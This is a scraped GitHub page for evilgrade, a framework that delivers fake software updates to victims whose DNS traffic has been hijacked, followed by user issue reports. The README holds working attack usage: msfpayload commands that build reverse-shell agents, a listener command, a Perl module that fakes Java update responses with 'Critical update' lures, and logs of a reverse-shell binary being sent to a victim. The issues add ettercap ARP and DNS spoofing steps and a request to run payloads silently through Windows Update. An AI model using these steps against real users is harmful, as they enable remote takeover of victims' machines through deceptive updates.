Code Monkey home page Code Monkey logo

evilgrade's Introduction

Faraday Security Research -- | ISR-evilgrade | www.faradaysec.com | --

.:: [BRIEF OVERVIEW] ::.

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.

* When should I use evilgrade?

This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:

Internal scenery:
  • Internal DNS access
  • ARP spoofing
  • DNS Cache Poisoning
  • DHCP spoofing
  • TCP hijacking
  • Wi-Fi Access Point impersonation
External scenery:
  • Internal DNS access
  • DNS Cache Poisoning
* How does it work?

Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.

* What OS are supported?

ISR-Evilgrade is crossplatform, it only depends of having an appropriate payload for the right target platform to be exploited.

Implemented modules:


  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es - (Windows software)
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • more...
  • /docs/CHANGES

.:: [MAIN USAGE] ::.

It works similar to an IOS console

evilgrade>help
Type 'help command' for more detailed help on a command.
  Commands:
    configure - Configure <module-name> - no help available
    exit      - exits the program
    help      - prints this screen, or help on 'command'
    reload    - Reload to update all the modules - no help available
    restart   - Restart webserver - no help available
    set       - Configure variables - no help available
    show      - Display information of <object>.
    start     - Start webserver - no help available
    status    - Get webserver status - no help available
    stop      - Stop webserver - no help available
    version   - Display framework version. - no help available

  Object:
     options  - Show options of current module.
     vhosts   - Show VirtualHosts of current module.
     modules  - List all modules available for use.
     active   - Show active modules.

List implemented modules

evilgrade>show modules

List of modules:
===============

...
...
...

- 63 modules available.

Configure a specified module

evilgrade>conf sunjava
evilgrade(sunjava)>

Show all VirtualHosts.

VirtualHost field contains the domains that our webserver is going to emulate for us.

evilgrade>show vhosts

Virtual hosts:
=============

[
  "java.sun.com",
  "javadl-esd.sun.com",
  ...
  ...
  ...
]

Show options of current module.

agent: This is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation (see ADVANCED).

evilgrade(sunjava)>show options

Display options:
===============

Name = Sun Microsystems Java
Version = 2.0
Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
Description = ""
VirtualHost = "java.sun.com|javadl-esd.sun.com"

.-------------------------------------------------------------------------------------------------------------------------.
| Name         | Default                                         | Description                                            |
+--------------+-------------------------------------------------+--------------------------------------------------------+
| website      | http://java.com/moreinfolink                    | Website displayed in the update                        |
| enable       |                                               1 | Status                                                 |
| atitle       | Critical vulnerability                          | Title name to be displayed in the systray item popup   |
| arg          |                                                 | Arg passed to Agent                                    |
| adescription | This critical update fix internal vulnerability | Description  to be displayed in the systray item popup |
| description  | This critical update fix internal vulnerability | Description to be displayed during the update          |
| agent        | ./agent/reverseshellsign.exe                    | Agent to inject                                        |
| title        | Critical update                                 | Title name displayed in the update                     |
'--------------+-------------------------------------------------+--------------------------------------------------------'

Start services (DNS Server and WebServer)

evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...

#### Waiting for victims

evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

Show status and victims logs

evilgrade>show status
Webserver (pid 4134) already running

Users status:
============

.---------------------------------------------------------------------------------------------------------------.
| Client         | Module           | Status | Md5,Cmd,File                                                     |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
'----------------+------------------+--------+------------------------------------------------------------------'

.:: [DEEP USAGE] ::.

Commands

configure / conf - Configure

Example:

evilgrade>configure sunjava
evilgrade(sunjava)>

evilgrade>conf sunjava
evilgrade(sunjava)>

## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>


##
reload    - Reload to get all modules update (to refresh loaded modules, useful on development)
start     - Start webserver
stop      - Stop webserver (fake update server)

Example:

evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...


#######################################



Example:
-------
evilgrade>stop
Stopping WEBSERVER  [OK]
Stopping DNSSERVER  [OK]

#######################################

restart   - Restart services (WebServer and DNS Server)
stops and starts again

#######################################

status    - Get webserver and victims status

Example:
-------
evilgrade>show status
Webserver (pid 4134) already running

Users status:
============

.---------------------------------------------------------------------------------------------------------------.
| Client         | Module           | Status | Md5,Cmd,File                                                     |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
'----------------+------------------+--------+------------------------------------------------------------------'

#######################################

show      - Display information of <object>.

#######################################

show active    - Display active modules in the webserver

#######################################

show modules    - Display implemented modules

#########################################

show options    - Display modules/global options

Example:
-------

evilgrade>show options

Display options:
===============

.-----------------------------------------------------------------------------------.
| Name        | Default   | Description                                             |
+-------------+-----------+---------------------------------------------------------+
| DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
| DNSPort     |        53 | Listen Name Server port                                 |
| debug       |         1 | Debug mode                                              |
| port        |        80 | Webserver listening port                                |
| sslport     |       443 | Webserver SSL listening port                            |
'-------------+-----------+---------------------------------------------------------'

evilgrade>
evilgrade(notepadplus)>conf vmware
evilgrade(vmware)>show options (without started services)

Display options:
===============

Name = VMware Server
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
Description = ""
VirtualHost = "www.vmware.com"

.----------------------------------------------.
| Name   | Default           | Description     |
+--------+-------------------+-----------------+
| enable |                 1 | Status          |
| agent  | ./agent/agent.exe | Agent to inject |
'--------+-------------------+-----------------'

evilgrade(vmware)>show options (with started services after setting agent)

Display options:
===============

Name = VMware Server
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
Description = ""
VirtualHost = "www.vmware.com"

.--------------------------------------------------------------------------------------------------.
| Name        | Default                                                          | Description     |
+-------------+------------------------------------------------------------------+-----------------+
| enable      |                                                                1 | Status          |
| agentmd5    | f80af637642170507bda998b6f2015fa                                 |                 |
| agentsize   |                                                            54576 |                 |
| agent       | ./agent/agent.exe                                                | Agent to inject |
| agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd |                 |
'-------------+------------------------------------------------------------------+-----------------'


#########################################

set       - Configure variables global or modules

Example:
-------

evilgrade>show options


Display options:
===============

.-----------------------------------------------------------------------------------.
| Name        | Default   | Description                                             |
+-------------+-----------+---------------------------------------------------------+
| DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
| DNSPort     |        53 | Listen Name Server port                                 |
| debug       |         0 | Debug mode                                              |
| port        |        80 | Webserver listening port                                |
| sslport     |       443 | Webserver SSL listening port                            |
'-------------+-----------+---------------------------------------------------------'

###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)

evilgrade>set debug 1 #Enable debug
set debug, 1

evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening
set DNSAnswerIp, 192.168.1.4

evilgrade>show options

Display options:
===============

.-------------------------------------------------------------------------------------.
| Name        | Default     | Description                                             |
+-------------+-------------+---------------------------------------------------------+
| DNSEnable   |           1 | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip  )                                  |
| DNSPort     |          53 | Listen Name Server port                                 |
| debug       |           1 | Debug mode                                              |
| port        |          80 | Webserver listening port                                |
| sslport     |         443 | Webserver SSL listening port                            |
'-------------+-------------+---------------------------------------------------------'


###############################

exit      - exits the program

#######################################

help      - prints this screen, or help on 'command'

#######################################

.:: [ADVANCED] ::.

  • Modules Options: Each module has special options, but the "agent" field is always present. The agent is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation.

[Dynamic fake update binary] allows the execution of an external command to generate our binary, for example using msfpayload of metasploit framework. With this feature we can generate any payload of metasploit or use an external interface to create the binary.

Example 1:

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

In this case for every required update binary we generate a fake update binary with the payload "windows/shell_reverse_tcp" using a reverse shell to connect at address 192.168.233.2 port 4141. The label <%OUT%><%OUT> is a special tag to detect where the output binary is going to be generated. Evilgrade detects the usage of "dynamic fake update binary feature" due to having a sentence between squared brackets '[]' Inside that brackets we have a string that is also between brackets "" that is compiled using perl.

For example if we use:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

then every time we get a binary request, evilgrade will compile the line and execute the final string "./generatebin -o /tmp/update(random).exe" generating different agents.

An easy alternative, but not dynamically, could be to generate the payload directly from msfpayload on a terminal and assign it manually to the configuration of the module.

Example 2:

(Outside evilgrade)

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

(Inside evilgrade)

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

After our payload was generated, we leave a multi handler listening on the previously assigned LHOST.

(Outside evilgrade)

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E
[*] Started reverse handler on 192.168.100.2:4444
[*] Starting the payload handler...

.:: [MODULE DEVELOPMENT] ::.

Module development is very simple. Since evilgrade is based on modules, you just have to use a package .pm (perl module). In this case we are going to describe the sunjava update module (comments with #):

package modules::sunjava;

use strict;
use Data::Dump qw(dump);

my $base=
{
    'name' => 'Sun Microsystems Java', #name of the module to display in the framework
    'version' => '2.0', #internal module version
    'appver' => '<= 1.6.0_22', #last application version tested with this evilgrade module
    'author' => [ 'Francisco Amato < famato +[AT]+ faradaysec.com>' ], #author
    'description' => qq{}, #brief description
    'vh' => '(java.sun.com|javadl-esd.sun.com)', #VirtualHosts that the application uses to retrieve information about the update configuration files and update binaries.

    #Then we have the request object's collection
    'request' => [
    #Each object it's a possible HTTP request inside the virtualhost configured for the module (java.sun.com)
        {
        'req' => '(/update/[.\d]+/map\-[.\d]+.xml|/update/1.6.0/map\-m\-1.6.0.xml)', #The required URL, regex friendly
        'type' => 'file', #it's the response type (file|string|agent|install)
         #we can use:
                      #file: response with content file referenced in the "file" option below (./include/sunjava_map.xml)
                      #string: response with a string referenced in the "string" options below
                      #agent:  response with content file referenced in the "agent" options (options section)
                      #install: response with content file referenced in the "file" option below
                        #It's used to know if the fake update was executed
                        #In some update process we can specify a final page after update installed
                        #so we send to a controller page.
        'method' => '', #not implemented yet
        'bin'    => '', #set to 1 if we are going to send a binary file
        'string' => '', #if we have chosen the 'type' string then in this variable we set the response
        'parse' => '', #set to 1 if the file or string need be parsed with options
        'file' => './include/sunjava/sunjava_map.xml'
        },

        {
        'req' => '^/java_update.xml$', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => '',
        'string' => '',
        'parse' => '1',
        'file' => './include/sunjava/sunjava_update.xml'
        },
        {
        'req' => '/x.jnlp', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => '',
        'string' => '',
        #In this case we parse the file
                    'parse' => '1',
        #To parse the file we use special tags, like <%OPTIONAME%> inside the "file" or "string" field
              #This tags are replaced with the values of the options, for example
              #<%TITLE%> will be replaced by 'Critical update'
        'file' => './include/sunjava/x.jnlp'
        },
        {
        'req' => '.jar', #regex friendly
        'type' => 'file', #file|string|agent|install
        'method' => '', #any
        'bin'    => 1,
        'string' => '',
        'parse' => '',
        'file' => './include/sunjava/JavaPayload/FunnyClass2.jar'
        },

        {
        'req' => '.exe', #regex friendly
        'type' => 'agent', #Here we have an agent type with a binary response
        'bin'    => 1,
        'method' => '', #any
        'string' => '',
        'parse' => '',
        'file' => ''
        }
    ],

    #Options
    #Here we have the options that will be displayed with "show options" inside the current module.
    #This options are used to parse the string or a file using in the responses
    'options' => {  'agent'  => { 'val' => './agent/java/javaws.exe', #The default value
              'desc' => 'Agent to inject'}, #Brief description
        'arg'    => { 'val' => 'http://java.sun.com/x.jnlp"',
              'desc' => 'Arg passed to Agent'},
        'enable' => { 'val' => 1,
              'desc' => 'Status'},

    #The following is a dynamic hidden option,
    #In this case we use the tag <%NAME%> to parse the files and execute perl functions to get randoms values
    #You can use whatever you like in perl, if you're wishing to use more functions check "isrcore/utils.pm"
                    'name'  => { 'val' => "'javaupdate'.isrcore::utils::RndAlpha(isrcore::utils::RndNum(1))",
                                'hidden' => 1,
                          'dynamic' =>1,},

    #All the options depend on the update process. You have to research the possible variables and implement them on your module
    #These are the mostly common update messages, webpages, descriptions, popup messages, title, etc
        'title'  => { 'val' => 'Critical update',
              'desc' => 'Title name displayed in the update'},
        'description' => { 'val' => 'This critical update fix internal vulnerability',
          'desc' => 'Description to be displayed during the update'},
        'atitle'  => { 'val' => 'Critical vulnerability',
               'desc' => 'Title name to be displayed in the systray item popup'},
        'adescription' => { 'val' => 'This critical update fix internal vulnerability',
          'desc' => 'Description  to be displayed in the systray item popup'},
        'website' => { 'val' => 'http://java.com/moreinfolink',
               'desc' => 'Website displayed in the update'}
     }
};

.:: [TIPS] ::.

  1. Don't forget to run evilgrade with an user that has privileges to create listening sockets, otherwise you won't be able to use evilgrade's Services.

  2. Everytime you modify a module with evilgrade running don't forget to 'reload' them.

  3. Set the binary 'agents' before starting services because there are some fields that evilgrade will fill out for you (agentmd5, agentsha256, and agentsize) that can't be done with them already running.

  4. If you're using a dynamic response with variables such as: <%AGENTSIZE%>, <%AGENTMD5%>, <%URL_FILE%>, <%URL_FILE_EXT%>, or custom ones defined at the options section, don't forget to set parse on 1.

  5. Same goes for injecting an agent, you must enable de bin flag on 1.

  6. If you want to make plaintext responses using HTTP use the cheader flag. Example below:

        {   'req' => '/sitepath/download/file.zip'
            ,    #regex friendly
            'type'    => 'string',                  #file|string|agent|install
            'method'  => '',                        #any
            'bin'     => '',
            'string'  => '',
            'parse'   => '1',
            'file'    => '',
            'cheader' => "HTTP/1.1 302 Found\r\n"
                . "Location: http://sitedomain.com/<%URL_FILE%>.exe \r\n"
                . "Content-Length: 0 \r\n"
                . "Connection: close \r\n\r\n",
        },

7) To filter via User-Agent, use as an example the Sparkle2 module. In base add  'useragent' => 'true', and on a request use as you would use the 'req' field but for user agents in 'useragent'. Note that this field already stripped "User-Agent: ".

.:: [REQUIREMENTS] ::.

Perl Modules

    Data::Dump
    Digest::MD5
    Time::HiRes
    RPC::XML

.:: [MORE INFORMATION] ::.

This framework was presented in the following security conferences:

ยท ekoparty 2007 [Buenos Aires, Argentina] [www.ekoparty.org]
ยท Troopers 2008 [Munich, Germany] [www.troopers08.org]
ยท Shakacon 2008 [Hawaii, USA] [www.shakacon.org]
ยท H2HC 2009 [Brazil] [www.h2hc.com.br]
ยท Blackhat Arsenal & Defcon 2010 [Las Vegas, USA] [www.blackhat.com www.defcon.org]

.:: [AUTHOR] ::.

Francisco Amato famato+at+faradaysec+dot+com

evilgrade's People

Contributors

f-amato avatar mattaereal avatar sinfocol avatar stavinski avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

evilgrade's Issues

RPC::XML Failing

Hi,
Been trying to install this tonight but following the instructions cpan RPC::XML i get this:

Reading '/root/.cpan/Metadata'
Database was generated on Sat, 16 Mar 2019 19:54:23 GMT
Running install for module 'RPC::XML'
Checksum for /root/.cpan/sources/authors/id/R/RJ/RJRAY/RPC-XML-0.80.tar.gz ok
Scanning cache /root/.cpan/build for sizes
............................................................................DONE
'YAML' not installed, will not store persistent state
Configuring R/RJ/RJRAY/RPC-XML-0.80.tar.gz with Makefile.PL
Checking if your kit is complete...
Looks good
Generating a Unix-style Makefile
Writing Makefile for RPC::XML
Writing MYMETA.yml and MYMETA.json
RJRAY/RPC-XML-0.80.tar.gz
/usr/bin/perl Makefile.PL INSTALLDIRS=site -- OK
Running make for R/RJ/RJRAY/RPC-XML-0.80.tar.gz
"/usr/bin/perl" etc/make_method --base=lib/Apache/RPC/status
"/usr/bin/perl" etc/make_method --base=methods/identity
"/usr/bin/perl" etc/make_method --base=methods/introspection
"/usr/bin/perl" etc/make_method --base=methods/listMethods
"/usr/bin/perl" etc/make_method --base=methods/methodHelp
"/usr/bin/perl" etc/make_method --base=methods/methodSignature
"/usr/bin/perl" etc/make_method --base=methods/multicall
"/usr/bin/perl" etc/make_method --base=methods/status
cp lib/RPC/XML/Server.pm blib/lib/RPC/XML/Server.pm
cp lib/RPC/XML/Parser/XMLParser.pm blib/lib/RPC/XML/Parser/XMLParser.pm
cp lib/RPC/XML.pm blib/lib/RPC/XML.pm
cp methods/methodSignature.xpl blib/lib/RPC/XML/methodSignature.xpl
cp methods/identity.xpl blib/lib/RPC/XML/identity.xpl
cp lib/RPC/XML/Parser.pm blib/lib/RPC/XML/Parser.pm
cp lib/Apache/RPC/status.xpl blib/lib/Apache/RPC/status.xpl
cp methods/listMethods.xpl blib/lib/RPC/XML/listMethods.xpl
cp lib/RPC/XML/Client.pm blib/lib/RPC/XML/Client.pm
cp lib/RPC/XML/ParserFactory.pm blib/lib/RPC/XML/ParserFactory.pm
cp methods/status.xpl blib/lib/RPC/XML/status.xpl
cp methods/introspection.xpl blib/lib/RPC/XML/introspection.xpl
cp methods/multicall.xpl blib/lib/RPC/XML/multicall.xpl
cp lib/RPC/XML/Parser/XMLLibXML.pm blib/lib/RPC/XML/Parser/XMLLibXML.pm
cp lib/RPC/XML/Procedure.pm blib/lib/RPC/XML/Procedure.pm
cp lib/Apache/RPC/Status.pm blib/lib/Apache/RPC/Status.pm
cp methods/methodHelp.xpl blib/lib/RPC/XML/methodHelp.xpl
cp lib/Apache/RPC/Server.pm blib/lib/Apache/RPC/Server.pm
cp etc/make_method blib/script/make_method
"/usr/bin/perl" -MExtUtils::MY -e 'MY->fixin(shift)' -- blib/script/make_method
Manifying 1 pod document
Manifying 10 pod documents
RJRAY/RPC-XML-0.80.tar.gz
/usr/bin/make -- OK
Running make test
PERL_DL_NONLAZY=1 "/usr/bin/perl" "-MExtUtils::Command::MM" "-MTest::Harness" "-e" "undef Test::Harness::Switches; test_harness(0, 'blib/lib', 'blib/arch')" t/.t
t/00_load.t ..................... ok
t/10_data.t ..................... ok
t/11_base64_fh.t ................ ok
t/12_nil.t ...................... ok
t/13_no_deep_recursion.t ........ ok
t/14_datetime_iso8601.t ......... ok
t/15_serialize.t ................ ok
t/20_xml_parser.t ............... ok
t/21_xml_libxml.t ............... ok
t/25_parser_negative.t .......... ok
t/29_parserfactory.t ............ ok
t/30_procedure.t ................ ok
t/35_namespaces.t ............... ok
t/40_server.t ................... 1/91

Failed test 'RPC::XML::Server::url method (set)'

at t/40_server.t line 188.

'http://[::1]:37723/'

doesn't match '(?^:http://(127[.]0[.]0[.]1|localhost|ip6-localhost|ip6-loopback|localhost[.]localdomain):37723)'

t/40_server.t ................... 41/91 Not an ARRAY reference at t/40_server.t line 333.

Looks like your test exited with 255 just after 43.

How do fix this please?
When I tried to run evilgrade I got this:

Can't locate RPC/XML.pm in @inc (you may need to install the RPC::XML module) (@inc contains: /root/Downloads/evilgrade /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.28.1 /usr/local/share/perl/5.28.1 /usr/lib/x86_64-linux-gnu/perl5/5.28 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.28 /usr/share/perl/5.28 /usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base) at /etc/perl/isrcore/shellz.pm line 36.
Compilation failed in require at ./evilgrade line 24.
BEGIN failed--compilation aborted at ./evilgrade line 24.

Can you please help?

Thank you
Stuart

updates?

this project is extremely outdated..

Error running evil-grade

root@kali:~# apt-get install isr-evilgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
caribou-antler castxml gccxml gir1.2-clutter-gst-2.0 gir1.2-gkbd-3.0
gir1.2-packagekitglib-1.0 gir1.2-xkl-1.0 gnome-icon-theme-symbolic
gtk2-engines gucharmap java-wrappers libadns1 libapache2-mod-php5
libasn1-8-heimdal libbasicusageenvironment0 libbind9-90
libboost-filesystem1.58.0 libboost-python1.58.0 libboost-system1.58.0
libboost-thread1.58.0 libcamel-1.2-54 libclutter-gst-2.0-0 libcrypto++9v5
libdns100 libexporter-tiny-perl libgdict-1.0-9 libgif4 libgrilo-0.2-1
libgroupsock1 libgssapi3-heimdal libgtkglext1 libgucharmap-2-90-7
libhcrypto4-heimdal libhdb9-heimdal libheimbase1-heimdal
libheimntlm0-heimdal libhunspell-1.3-0 libhx509-5-heimdal libical1a
libilmbase6v5 libisc95 libisccc90 libisccfg90 libjasper1 libkdc2-heimdal
libkrb5-26-heimdal liblist-moreutils-perl liblivemedia23 libllvm3.7
liblouis9 liblwres90 libntdb1 libonig2 libopenexr6v5 libpng12-0 libpoppler57
libpth20 libqdbm14 libqmi-glib1 libquvi-scripts libquvi7 libregfi0
libroken18-heimdal libsysfs2 libtask-weaken-perl libtrio2
libusageenvironment1 libwebpdemux1 libwebpmux1 libwebrtc-audio-processing-0
libwind0-heimdal libzip2 php5 php5-cli php5-common php5-json php5-mysql
php5-readline python-adns python-characteristic python-ctypeslib
python-distlib python-easygui python-ecdsa python-levenshtein python-lzma
python-lzo python-metaconfig python-ntdb python-opengl python-pyatspi
python-pyqtgraph python-qt4-gl python-tidylib ruby-rainbow ruby-rexec
ruby2.2-dev system-config-printer
Use 'apt autoremove' to remove them.
The following NEW packages will be installed:
isr-evilgrade
0 upgraded, 1 newly installed, 0 to remove and 139 not upgraded.
Need to get 0 B/7,720 kB of archives.
After this operation, 13.8 MB of additional disk space will be used.
Selecting previously unselected package isr-evilgrade.
(Reading database ... 343315 files and directories currently installed.)
Preparing to unpack .../isr-evilgrade_2.0.7+git20160629-0kali1_all.deb ...
Unpacking isr-evilgrade (2.0.7+git20160629-0kali1) ...
Setting up isr-evilgrade (2.0.7+git20160629-0kali1) ...

root@kali:~# evilgrade
Base class package "isrcore::Shell" is empty.
(Perhaps you need to 'use' the module which defines that package first,
or make that module available in @inc (@inc contains: /etc/perl /usr/local/lib/i386-linux-gnu/perl/5.22.2 /usr/local/share/perl/5.22.2 /usr/lib/i386-linux-gnu/perl5/5.22 /usr/share/perl5 /usr/lib/i386-linux-gnu/perl/5.22 /usr/share/perl/5.22 /usr/local/lib/site_perl /usr/lib/i386-linux-gnu/perl-base .).
at isrcore/shellz.pm line 29.
BEGIN failed--compilation aborted at isrcore/shellz.pm line 29.
Compilation failed in require at ./evilgrade line 24.
BEGIN failed--compilation aborted at ./evilgrade line 24.

root@kali:~# uname -a
Linux kali 4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

please release a stable version

There are no links on stable tar ball. I've found an older version 2.0.0 however there is a tag 2.0.5. Please release a stable version (at github would be the best).

Evilgrade issue

Evilgrade setup

Create a payload

Run evilgrade

Show modules choose one

Configure notepadplus

Get the path to your payload
Pwd

Set the agent to that

Set agent path

Start

Edit the ettercap.dns file
Adding the url and A your ipv4 save it make sure the tags are gone

Run your msf listener

Run ettercap

Make sure ettercap isnโ€™t running

Unified sniffing enabled

Load the plug-in dns spoof

Scan for hosts

Add your router to target one and the target to target two

Setup the arp poison to sniff remotely

Start ettercap

I get a GUP XML error

using Windows Update Agent 3.0 for faking updates install

Hi I was wondering is it posible to hook into Windows Update Agent 3.0 instead of plain file download

as you can see here: https://youtu.be/9uDXtJqdcKM?t=185 when user click install updates it automaticly launches Windows Update Agent 3.0 without even asking user if her/she want's to run update setup file

it would be more autentic to just run payload for hin instead of leting user choose to run downloaded payload

Is this even posible?

BTW: it would be interesting if evilgrade could scan user computer and present specific list of updates to the user like MS does it

Thanks for Anwsering and Best Regards

Wont start on Kali rolling 2016.1

Same or similar issue as issue #5 which was closed with a fix.
Im getting this issue on Kali rolling 2016.1. with fresh git clone of evilgrade as of 25/06/2016.
Have installed RPC::XML and Data::Dump with apt-get install librpc-xml-perl && apt-get install libdata-dump-perl.

Error:

www.infobytesec.com

    78 modules available.

evilgrade>Use of uninitialized value $prompt in concatenation (.) or string at /usr/lib/x86_64-linux-gnu/perl5/5.22/Term/ReadLine/Gnu.pm line 318

Regards.

Enhancement request

Evilgrade can do several malicious upgrades for several applications even cross platform like itunes and others, but there is nothing for Android devices, and there are two really popular applications in android world i.e playstore and whatsapp, if evilgrade could have something for such popular apps it would be really good. I also tried the skype upgrade on android skype version, even sniffed the urls it was sending requests to and redirected those to evilgrade, but still didn't work.

pls tell me the solution of this problem

root@kali:/home/kali/Downloads/evilgrade# ./evilgrade
Can't locate RPC/XML.pm in @inc (you may need to install the RPC::XML module) (@inc contains: /home/kali/Downloads/evilgrade /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.30.3 /usr/local/share/perl/5.30.3 /usr/lib/x86_64-linux-gnu/perl5/5.30 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.30 /usr/share/perl/5.30 /usr/local/lib/site_perl) at /etc/perl/isrcore/shellz.pm line 36.
Compilation failed in require at ./evilgrade line 26.
BEGIN failed--compilation aborted at ./evilgrade line 26.

Can not display this Web page On Victime Machine

Hi,
i run Evilgrade with ettercap, everything runs good. but when i tried browing "http://windowsupdate.microsoft.com/" or any other web site in my victime machine i got "can not display this Web page"

Evilgrade Log:

evilgrade(winupdate)>
[2/9/2017:12:36:8] - [DEBUG] - [WEBSERVER] -[192.168.2.132] - Packet request: "GET /pca3-g5.crl HTTP/1.1\r\n"

evilgrade(winupdate)>
